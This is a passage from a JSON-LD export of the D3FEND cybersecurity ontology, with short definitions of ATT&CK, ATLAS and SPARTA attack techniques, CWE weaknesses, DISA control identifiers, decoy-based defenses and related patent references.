      "d3f:kb-abstract": "A training system senses a user action that may expose the user to a threat, such as a cybersecurity threat. The user action may be in response to a mock attack delivered via a messaging service, a wireless communication service, a fake malware application or another device, service, system or mechanism. The system selects a training action from a collection of available training actions and causes the training action to be delivered to the user.",
      "d3f:kb-author": "Norman Sadeh-Koniecpol, Kurt Wescoe, Jason Brubaker, Jason Hong",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "WOMBAT SECURITY TECHNOLOGIES Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:DecoyPublicRelease"
      },
      "d3f:kb-reference-title": "Mock attack cybersecurity training system and methods",
      "rdfs:label": "Reference - Mock attack cybersecurity training system and methods - WOMBAT SECURITY TECHNOLOGIES Inc"
    },
    {
      "@id": "d3f:CCI-000219_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, when transferring information between different security domains, decomposes information into organization-defined policy-relevant subcomponents for submission to policy enforcement mechanisms.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000219"
    },
    {
      "@id": "d3f:T1598",
      "@type": "owl:Class",
      "d3f:attack-id": "T1598",
      "d3f:definition": "Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.",
      "rdfs:label": "Phishing for Information",
      "rdfs:subClassOf": {
        "@id": "d3f:ReconnaissanceTechnique"
      }
    },
    {
      "@id": "d3f:T1568.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1568.002",
      "d3f:definition": "Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)",
      "rdfs:label": "Domain Generation Algorithms",
      "rdfs:subClassOf": {
        "@id": "d3f:T1568"
      }
    },
    {
      "@id": "d3f:T0822",
      "@type": "owl:Class",
      "d3f:attack-id": "T0822",
      "d3f:definition": "Adversaries may leverage external remote services as a point of initial access into your network. These services allow users to connect to internal network resources from external locations. Examples are VPNs, Citrix, and other access mechanisms. Remote service gateways often manage connections and credential authentication for these services. (Citation: Daniel Oakley, Travis Smith, Tripwire)",
      "rdfs:label": "External Remote Services - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInitialAccessTechnique"
      },
      "skos:prefLabel": "External Remote Services"
    },
    {
      "@id": "d3f:AML.T0018",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0018",
      "d3f:definition": "Adversaries may directly manipulate an AI model to change its behavior or introduce malicious code. Manipulating a model gives the adversary a persistent change in the system. This can include poisoning the model by changing its weights, modifying the model architecture to change its behavior, and embedding malware which may be executed when the model is loaded.",
      "rdfs:label": "Manipulate AI Model - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0018"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASAIAttackStagingTechnique"
        },
        {
          "@id": "d3f:ATLASPersistenceTechnique"
        }
      ],
      "skos:prefLabel": "Manipulate AI Model"
    },
    {
      "@id": "d3f:LaptopComputer",
      "@type": "owl:Class",
      "d3f:definition": "A laptop computer (also laptop), is a small, portable personal computer (PC) with a \"clamshell\" form factor, typically having a thin LCD or LED computer screen mounted on the inside of the upper lid of the clamshell and an alphanumeric keyboard on the inside of the lower lid. The clamshell is opened up to use the computer. Laptops are folded shut for transportation, and thus are suitable for mobile use. Its name comes from lap, as it was deemed to be placed on a person's lap when being used. Although originally there was a distinction between laptops and notebooks (the former being bigger and heavier than the latter), as of 2014, there is often no longer any difference. Today, laptops are commonly used in a variety of settings, such as at work, in education, for playing games, web browsing",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Laptop"
      },
      "rdfs:label": "Laptop Computer",
      "rdfs:subClassOf": {
        "@id": "d3f:PersonalComputer"
      },
      "skos:altLabel": [
        "Laptop",
        "Notebook"
      ]
    },
    {
      "@id": "d3f:DecoyUserCredential",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DecoyUserCredential"
      ],
      "d3f:d3fend-id": "D3-DUC",
      "d3f:definition": "A Credential created for the purpose of deceiving an adversary.",
      "d3f:kb-article": "## How it works\nA detection analytic is developed to determine when a user uses decoy credentials. Subsequent actions by that user may be monitored or controlled by the defender.\n\nA credential may be:\n * Domain username and password\n * Local system username and password\n\n## Considerations\n* Decoy credentials should be integrated with a larger decoy environment to ensure that when decoy credentials are compromised, the credentials are used to interact with a decoy asset that is being monitored.\n* Continuous maintenance and updates are needed to ensure the legitimacy of the larger decoy environment and specifically the assets that utilize the decoy credentials.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-DecoyAndDeceptiveDataObjectTechnology_CymmetriaInc"
        },
        {
          "@id": "d3f:Reference-DecoyNetwork-BasedServiceForDeceivingAttackers-AmazonTechnologies"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodForIdentifyingThePresenceOfMalwareUsingMini-trapsSetAtNetworkEndpoints_FidelisCybersecuritySolutionsInc"
        }
      ],
      "d3f:spoofs": {
        "@id": "d3f:Credential"
      },
      "rdfs:label": "Decoy User Credential",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DecoyObject"
        },
        {
          "@id": "_:N0183edc93d76494d90b0df913aac9179"
        }
      ]
    },
    {
      "@id": "_:N0183edc93d76494d90b0df913aac9179",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:spoofs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:RegressionAnalysisLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-RAL",
      "d3f:definition": "Regression is used to understand the relationship between dependent and independent variables which is then used to make projections, such as for sales revenue for a given business.",
      "d3f:kb-article": "## References\nSupervised Learning. IBM. [Link](https://www.ibm.com/topics/supervised-learning).",
      "rdfs:label": "Regression Analysis Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:SupervisedLearning"
      }
    },
    {
      "@id": "d3f:CCI-002464_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides data integrity protection artifacts for internal name/address resolution queries.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002464"
    },
    {
      "@id": "d3f:T1056.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:GraphicalUserInterface"
      },
      "d3f:attack-id": "T1056.002",
      "d3f:definition": "Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).",
      "rdfs:label": "GUI Input Capture",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1056"
        },
        {
          "@id": "_:N4a3ec488584b4347b7b2c04475a6f6f9"
        }
      ]
    },
    {
      "@id": "_:N4a3ec488584b4347b7b2c04475a6f6f9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GraphicalUserInterface"
      }
    },
    {
      "@id": "d3f:CWE-777",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-777",
      "d3f:definition": "The product uses a regular expression to perform neutralization, but the regular expression is not anchored and may allow malicious or malformed data to slip through.",
      "rdfs:label": "Regular Expression without Anchors",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-625"
      }
    },
    {
      "@id": "d3f:T1592",
      "@type": "owl:Class",
      "d3f:attack-id": "T1592",
      "d3f:definition": "Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).",
      "rdfs:label": "Gather Victim Host Information",
      "rdfs:subClassOf": {
        "@id": "d3f:ReconnaissanceTechnique"
      }
    },
    {
      "@id": "d3f:RemoteProcedureCall",
      "@type": "owl:Class",
      "d3f:definition": "In distributed computing a remote procedure call (RPC) is when a computer program causes a procedure (subroutine) to execute in another address space (commonly on another computer on a shared network), which is coded as if it were a normal (local) procedure call, without the programmer explicitly coding the details for the remote interaction. That is, the programmer writes essentially the same code whether the subroutine is local to the executing program, or remote. This is a form of client-server interaction (caller is client, executor is server), typically implemented via a request-response message-passing system. The object-oriented programming analog is remote method invocation (RMI). The RPC model implies a level of location transparency.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Remote_procedure_call"
      },
      "rdfs:label": "Remote Procedure Call",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/dce_rpc"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RemoteCommand"
      }
    },
    {
      "@id": "d3f:T1590.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1590.005",
      "d3f:definition": "Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.",
      "rdfs:label": "IP Addresses",
      "rdfs:subClassOf": {
        "@id": "d3f:T1590"
      }
    },
    {
      "@id": "d3f:OSAPIResumeProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that resumes the execution of a paused, stopped, or suspended process.",
      "d3f:invokes": {
        "@id": "d3f:ResumeProcess"
      },
      "rdfs:label": "OS API Resume Process",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N60be2b1720d54354aefa52543cfcdb8d"
        }
      ]
    },
    {
      "@id": "_:N60be2b1720d54354aefa52543cfcdb8d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ResumeProcess"
      }
    },
    {
      "@id": "d3f:CWE-1085",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1085",
      "d3f:definition": "A function, method, procedure, etc. contains an excessive amount of code that has been commented out within its body.",
      "rdfs:label": "Invokable Control Element with Excessive Volume of Commented-out Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1078"
      }
    },
    {
      "@id": "d3f:HeterogeneousAsymmetricFeature-basedTransferLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-HAFBTL",
      "d3f:definition": "Asymmetric transformation mapping  transforms the source feature space to align with that of the target or the target to that of the source. This, in effect, bridges the feature space gap and reduces the problem into a homogeneous transfer problem when further distribution differences need to be corrected.",
      "d3f:kb-article": "## References\nWang, Q., Mao, K. Z., Wang, B., & Guan, J. (2017). Big data clustering by hybrid optimization algorithm. Journal of Big Data, 4(1), 25. [Link](https://journalofbigdata.springeropen.com/articles/10.1186/s40537-017-0089-0).",
      "rdfs:label": "Heterogeneous Asymmetric Feature-based Transfer Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:HeterogeneousTransferLearning"
      }
    },
    {
      "@id": "d3f:OutboundInternetDNSLookupTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Outbound internet DNS lookup traffic is network traffic using the DNS protocol on an outgoing connection initiated from a host within a network to a host outside the network.",
      "d3f:may-contain": {
        "@id": "d3f:DNSLookup"
      },
      "rdfs:label": "Outbound Internet DNS Lookup Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Internetworking"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DNSNetworkTraffic"
        },
        {
          "@id": "d3f:OutboundInternetNetworkTraffic"
        },
        {
          "@id": "d3f:OutboundNetworkTraffic"
        },
        {
          "@id": "_:Nf00ef79ebb4047008671b3adfb4cf4e7"
        }
      ]
    },
    {
      "@id": "_:Nf00ef79ebb4047008671b3adfb4cf4e7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DNSLookup"
      }
    },
    {
      "@id": "d3f:T1027.015",
      "@type": "owl:Class",
      "d3f:attack-id": "T1027.015",
      "d3f:definition": "Adversaries may use compression to obfuscate their payloads or files. Compressed file formats such as ZIP, gzip, 7z, and RAR can compress and archive multiple files together to make it easier and faster to transfer files. In addition to compressing files, adversaries may also compress shellcode directly - for example, in order to store it in a Windows Registry key (i.e., [Fileless Storage](https://attack.mitre.org/techniques/T1027/011)).(Citation: Trustwave Pillowmint June 2020)",
      "rdfs:label": "Compression",
      "rdfs:subClassOf": {
        "@id": "d3f:T1027"
      }
    },
    {
      "@id": "d3f:IPCNetworkTraffic",
      "@type": "owl:Class",
      "d3f:definition": "IPC network traffic is network traffic related to inter-process communication (IPC) between network nodes..This includes only network traffic conforming to a standard IPC protocol; not custom protocols.",
      "rdfs:label": "IPC Network Traffic",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:ANN-basedClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-ABC",
      "d3f:definition": "Combines the principles of Artificial Neural Networks (ANN) and clustering methods.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Artificial neural network. [Link](https://en.wikipedia.org/wiki/Artificial_neural_network)",
      "rdfs:label": "ANN-based Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:ClusterAnalysis"
      }
    },
    {
      "@id": "d3f:RDPInitialRequestEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an RDP client initiates communication with a server by sending a request to establish a session and negotiate protocol capabilities for remote interaction.",
      "rdfs:label": "RDP Initial Request Event",
      "rdfs:subClassOf": {
        "@id": "d3f:RDPEvent"
      }
    },
    {
      "@id": "d3f:CWE-1311",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1311",
      "d3f:definition": "The bridge incorrectly translates security attributes from either trusted to untrusted or from untrusted to trusted when converting from one fabric protocol to another.",
      "rdfs:label": "Improper Translation of Security Attributes by Fabric Bridge",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:CCI-002283_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system maintains the integrity of organization-defined security attributes associated with organization-defined subjects.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002283"
    },
    {
      "@id": "d3f:CCI-002009_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system accepts Personal Identity Verification (PIV) credentials from other federal agencies.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:BiometricAuthentication"
        },
        {
          "@id": "d3f:Certificate-basedAuthentication"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-05-03T00:00:00"
      },
      "rdfs:label": "CCI-002009"
    },
    {
      "@id": "d3f:DS0012",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A file or stream containing a list of commands, allowing them to be launched in sequence",
      "rdfs:comment": "This data source captures events relating to scripts and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "Script (ATT&CK DS)"
    },
    {
      "@id": "d3f:LinuxPauseProcess",
      "@type": "owl:Class",
      "d3f:definition": "Causes the calling process to sleep until a signal is delivered that either terminates the process or causes the invocation of a signal-catching function.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/pause.2.html"
      },
      "rdfs:label": "Linux Pause Process",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPISuspendProcess"
      }
    },
    {
      "@id": "d3f:T1587",
      "@type": "owl:Class",
      "d3f:attack-id": "T1587",
      "d3f:definition": "Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)",
      "rdfs:label": "Develop Capabilities",
      "rdfs:subClassOf": {
        "@id": "d3f:ResourceDevelopmentTechnique"
      }
    },
    {
      "@id": "d3f:T0868",
      "@type": "owl:Class",
      "d3f:attack-id": "T0868",
      "d3f:definition": "Adversaries may gather information about a PLCs or controllers current operating mode. Operating modes dictate what change or maintenance functions can be manipulated and are often controlled by a key switch on the PLC (e.g.,  run, prog [program], and remote). Knowledge of these states may be valuable to an adversary to determine if they are able to reprogram the PLC. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below:",
      "rdfs:label": "Detect Operating Mode - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCollectionTechnique"
      },
      "skos:prefLabel": "Detect Operating Mode"
    },
    {
      "@id": "d3f:EXF-0002.02",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0002.02",
      "d3f:definition": "Switching activity in chips, buses, and clocks radiates EM energy that can be captured and analyzed to reveal internal computation. Near-field probes (in test) or proximity receivers (on-orbit assets) can observe harmonics and modulation tied to cipher rounds, key schedules, or protocol framing, sometimes with finer granularity than power analysis. Coupling paths include packages, harnesses, SDR front ends, and poorly shielded enclosures. By training on known operations and comparing spectra or time-domain signatures, an adversary can recover keys or reconstruct processed data without touching logical interfaces.",
      "rdfs:label": "Electromagnetic Leakage Attacks - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0002/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EXF-0002"
      },
      "skos:prefLabel": "Electromagnetic Leakage Attacks"
    },
    {
      "@id": "d3f:DS0026",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A database and set of services that allows administrators to manage permissions, access to network resources, and stored data objects (user, group, application, or devices)",
      "rdfs:comment": "This data source captures events relating to Active Directory objects and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "Active Directory (ATT&CK DS)"
    },
    {
      "@id": "d3f:CWE-326",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-326",
      "d3f:definition": "The product stores or transmits sensitive data using an encryption scheme that is theoretically sound, but is not strong enough for the level of protection required.",
      "rdfs:label": "Inadequate Encryption Strength",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:CWE-578",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-578",
      "d3f:definition": "The product violates the Enterprise JavaBeans (EJB) specification by using the class loader.",
      "rdfs:label": "EJB Bad Practices: Use of Class Loader",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-573"
      }
    },
    {
      "@id": "d3f:EX-0014.03",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0014.03",
      "d3f:definition": "The attacker presents fabricated or biased measurements that estimation and control treat as ground truth. Targets include attitude/position sensors (star trackers, gyros/IMUs, sun sensors, magnetometers, GNSS), environmental and health sensors (temperatures, currents, voltages, pressures), and payload measurements used in autonomy. Spoofs may be injected electrically at interfaces, optically (blinding/dazzling trackers or sun sensors), magnetically, or by crafting packets fed into sensor gateways. Even small, consistent biases can drive filters to incorrect states; stepwise changes can trigger fault responses or mode switches. Downstream, timestamps, quality flags, and derived products inherit the deception, creating uncertainty for operators and potentially inducing temporary loss of service as autonomy reacts to a world that never existed.",
      "rdfs:label": "Sensor Data - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0014/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0014"
      },
      "skos:prefLabel": "Sensor Data"
    },
    {
      "@id": "d3f:T1027.016",
      "@type": "owl:Class",
      "d3f:attack-id": "T1027.016",
      "d3f:definition": "Adversaries may use junk code / dead code to obfuscate a malware’s functionality. Junk code is code that either does not execute, or if it does execute, does not change the functionality of the code. Junk code makes analysis more difficult and time-consuming, as the analyst steps through non-functional code instead of analyzing the main code. It also may hinder detections that rely on static code analysis due to the use of benign functionality, especially when combined with [Compression](https://attack.mitre.org/techniques/T1027/015) or [Software Packing](https://attack.mitre.org/techniques/T1027/002).(Citation: ReasonLabs)(Citation: ReasonLabs Cyberpedia Junk Code)",
      "rdfs:label": "Junk Code Insertion",
      "rdfs:subClassOf": {
        "@id": "d3f:T1027"
      }
    },
    {
      "@id": "d3f:OSAPIDeleteFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that removes a file from the file system.",
      "d3f:invokes": {
        "@id": "d3f:DeleteFile"
      },
      "rdfs:label": "OS API Delete File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:Ncde6c8d43e5a45b5b6bfed4852f513a9"
        }
      ]
    },
    {
      "@id": "_:Ncde6c8d43e5a45b5b6bfed4852f513a9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DeleteFile"
      }
    },
    {
      "@id": "d3f:CWE-939",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-939",
      "d3f:definition": "The product uses a handler for a custom URL scheme, but it does not properly restrict which actors can invoke the handler using the scheme.",
      "rdfs:label": "Improper Authorization in Handler for Custom URL Scheme",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-862"
      }
    },
    {
      "@id": "d3f:Reference-Deception-BasedResponsesToSecurityAttacks_CrowdstrikeInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20140250524A1/en?oq=US-2014250524-A1"
      },
      "d3f:kb-abstract": "Deception-based techniques for responding to security attacks are described herein. The techniques include transitioning a security attack to a monitored computing device posing as a computing device impacted by the security attack and enabling the adversary to obtain deceptive information from the monitored computing device. Also, the adversary may obtain a document configured to report identifying information of an entity opening the document, thereby identifying the adversary associated with the attack. Further, the techniques include determining that a domain specified in a domain name request is associated with malicious activity and responding to the request with a network address of a monitored computing device to cause the requesting process to communicate with the monitored computing device in place of an adversary server. Additionally, a service may monitor dormant domains names associated with malicious activity and, in response to a change, respond with an alert or a configuration update.",
      "d3f:kb-author": "Adam S. Meyers; Dmitri Alperovitch; George Robert Kurtz; David F. Diehl; Sven Krasser",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Crowdstrike Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:DecoyNetworkResource"
      },
      "d3f:kb-reference-title": "Deception-Based Responses to Security Attacks",
      "rdfs:label": "Reference - Deception-Based Responses to Security Attacks - Crowdstrike Inc"
    },
    {
      "@id": "d3f:OSAPICopyToken",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that creates a duplicate or copy of an existing security token.",
      "d3f:invokes": {
        "@id": "d3f:CopyToken"
      },
      "rdfs:label": "OS API Copy Token",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N8bc27d2a8cdd4ea3b1dcf0040003ba53"
        }
      ]
    },
    {
      "@id": "_:N8bc27d2a8cdd4ea3b1dcf0040003ba53",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CopyToken"
      }
    },
    {
      "@id": "d3f:CWE-837",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-837",
      "d3f:definition": "The product requires that an actor should only be able to perform an action once, or to have only one unique action, but the product does not enforce or improperly enforces this restriction.",
      "rdfs:label": "Improper Enforcement of a Single, Unique Action",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-799"
      }
    },
    {
      "@id": "d3f:UtilitySoftware",
      "@type": "owl:Class",
      "d3f:definition": "Utility applications are software applications designed to help to analyze, configure, optimize or maintain a computer. It is used to support the computer infrastructure - in contrast to application software, which is aimed at directly performing tasks that benefit ordinary users. However, utilities often form part of the application systems. For example, a batch job may run user-written code to update a database and may then include a step that runs a utility to back up the database, or a job may run a utility to compress a disk before copying files.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Utility_software"
      },
      "rdfs:label": "Utility Software",
      "rdfs:subClassOf": {
        "@id": "d3f:Software"
      },
      "skos:altLabel": "Utility Application"
    },
    {
      "@id": "d3f:CWE-1090",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1090",
      "d3f:definition": "A method for a class performs an operation that directly accesses a member element from another class.",
      "rdfs:label": "Method Containing Access of a Member Element from Another Class",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1061"
      }
    },
    {
      "@id": "d3f:CWE-565",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-565",
      "d3f:definition": "The product relies on the existence or values of cookies when performing security-critical operations, but it does not properly ensure that the setting is valid for the associated user.",
      "rdfs:label": "Reliance on Cookies without Validation and Integrity Checking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-602"
        },
        {
          "@id": "d3f:CWE-642"
        }
      ]
    },
    {
      "@id": "d3f:NTFSHardLink",
      "@type": "owl:Class",
      "d3f:definition": "An NTFS hard link points to another file, and files share the same MFT entry (inode), in the same filesystem.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:NTFS_links"
      },
      "rdfs:label": "NTFS Hard Link",
      "rdfs:seeAlso": {
        "@id": "dbr:Hard_link"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardLink"
        },
        {
          "@id": "d3f:NTFSLink"
        }
      ]
    },
    {
      "@id": "d3f:M1045",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:DriverLoadIntegrityChecking"
        },
        {
          "@id": "d3f:ExecutableAllowlisting"
        },
        {
          "@id": "d3f:ServiceBinaryVerification"
        }
      ],
      "rdfs:label": "Code Signing"
    },
    {
      "@id": "d3f:CWE-1394",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1394",
      "d3f:definition": "The product uses a default cryptographic key for potentially critical functionality.",
      "rdfs:label": "Use of Default Cryptographic Key",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1392"
      }
    },
    {
      "@id": "d3f:SystemInitScript",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A script used to initialize and configure elements of the system's environment, applications, services, or its operating system.",
      "rdfs:label": "System Init Script",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutableScript"
        },
        {
          "@id": "d3f:SystemConfigurationInitResource"
        },
        {
          "@id": "d3f:SystemInitConfiguration"
        }
      ]
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_MA-6_2",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Timely Maintenance | Predictive Maintenance",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:SoftwareUpdate"
      },
      "rdfs:label": "MA-6(2)"
    },
    {
      "@id": "d3f:copy-of",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x copy-of y: The subject x is a duplicate of the object y.",
      "rdfs:label": "copy-of",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:DiskImage",
      "@type": "owl:Class",
      "d3f:definition": "A disk image is a snapshot of a storage device's structure and data typically stored in one or more computer files on another storage device.",
      "rdfs:isDefinedBy": {
        "@id": "https://en.wikipedia.org/wiki/Disk_image"
      },
      "rdfs:label": "Disk Image",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/resource/Disk_image"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:StorageImage"
      }
    },
    {
      "@id": "d3f:Projection-basedClustering",
      "@type": [
        "owl:Class",
